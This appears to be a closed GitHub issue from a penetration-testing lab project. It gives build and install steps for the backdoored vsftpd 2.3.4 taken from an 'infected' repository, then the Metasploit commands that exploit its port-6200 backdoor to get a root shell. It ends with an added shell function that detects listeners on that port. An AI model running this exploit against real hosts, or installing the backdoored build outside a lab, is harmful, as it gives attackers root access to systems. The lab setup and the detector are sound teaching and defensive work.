Closed stanley0010 closed 1 year ago
vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor that opens a shell on port 6200/tcp.
Tested: the exploit is valid, confirmed by setting up vsftpd on Ubuntu 22.04.2 and exploiting it from Kali Linux with Metasploit.
Download vsftpd from GitHub: https://github.com/nikdubois/vsftpd-2.3.4-infected.git
```bash
cd ~/
git clone https://github.com/nikdubois/vsftpd-2.3.4-infected.git
sudo apt-get install build-essential
cd ~/vsftpd-2.3.4-infected
# We need to change the Makefile: add `-lcrypt` as a linker flag
# LINK = -Wl,-s,-lcrypt
make
# The following steps modify system accounts and directories, so they need root
sudo useradd nobody
sudo mkdir /usr/share/empty
sudo cp vsftpd /usr/local/sbin/vsftpd
sudo cp vsftpd.8 /usr/local/man/man8
sudo cp vsftpd.conf.5 /usr/local/man/man5
sudo cp vsftpd.conf /etc
sudo mkdir /var/ftp/
sudo useradd -d /var/ftp ftp
sudo chown root:root /var/ftp
sudo chmod og-w /var/ftp
sudo /usr/local/sbin/vsftpd &
# We need to enable local login to the vsftpd server by changing `/etc/vsftpd.conf`
# # Uncomment this to allow local users to log in.
# local_enable=YES
```
Reference: Hands-On AWS Penetration Testing with Kali Linux - OREILLY https://learning.oreilly.com/library/view/hands-on-aws-penetration/9781789136722/3079bfef-1db6-42da-b597-62a09470404a.xhtml
We can use Metasploit to run an exploit against vsftpd:
```
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST <ip address of Ubuntu server>
exploit
# It will then provide an interactive reverse shell with root privileges
```
Reference: Hands-On AWS Penetration Testing with Kali Linux - OREILLY https://learning.oreilly.com/library/view/hands-on-aws-penetration/9781789136722/4fdd1253-b5bb-4744-885e-43c98b80bbc5.xhtml https://westoahu.hawaii.edu/cyber/forensics-weekly-executive-summmaries/8424-2/
Find a vulnerable software with a public exploit (available on exploitdb). Attacker gets root after running the exploit. Only find it. Install this software in another issue.
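A defender-side check for the behaviour described above (a shell opened on port 6200/tcp), added here as an example and not part of the original issue or of vsftpd: it parses `ss -Hltnp`-style output and flags any TCP listener on that port. The function names and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag any TCP listener on 6200, the port the backdoored
# vsftpd 2.3.4 build opens its shell on (per the description above).
BACKDOOR_PORT=6200

# Reads `ss -Hltnp`-style lines on stdin (State Recv-Q Send-Q Local Peer Process).
# Prints "port local_address process" for each listener on BACKDOOR_PORT.
# Exit status: 0 if at least one listener was found, 1 otherwise.
find_backdoor_listener() {
    awk -v port="$BACKDOOR_PORT" '
        $1 == "LISTEN" {
            addr = $4
            # The port is the last colon-separated field, which also
            # handles IPv6 forms such as [::]:6200.
            n = split(addr, parts, ":")
            if (parts[n] == port) {
                proc = ($6 != "") ? $6 : "users:(unknown)"
                print port, addr, proc
                found = 1
            }
        }
        END { exit !found }
    '
}

# Constructed sample input (not captured from a real host). The 16200
# listener is included to show that a port merely ending in 6200 is ignored.
sample_ss_output() {
    cat <<'EOF'
LISTEN 0      32          0.0.0.0:21         0.0.0.0:*    users:(("vsftpd",pid=1234,fd=3))
LISTEN 0      100         0.0.0.0:6200       0.0.0.0:*    users:(("vsftpd",pid=1250,fd=5))
LISTEN 0      128       127.0.0.1:16200      0.0.0.0:*    users:(("app",pid=900,fd=7))
LISTEN 0      128            [::]:22            [::]:*    users:(("sshd",pid=800,fd=4))
EOF
}
```

On a lab host, run `ss -Hltnp | find_backdoor_listener` as root so the owning process is shown; a hit next to a running vsftpd 2.3.4 is a strong indicator that the backdoored build is in use.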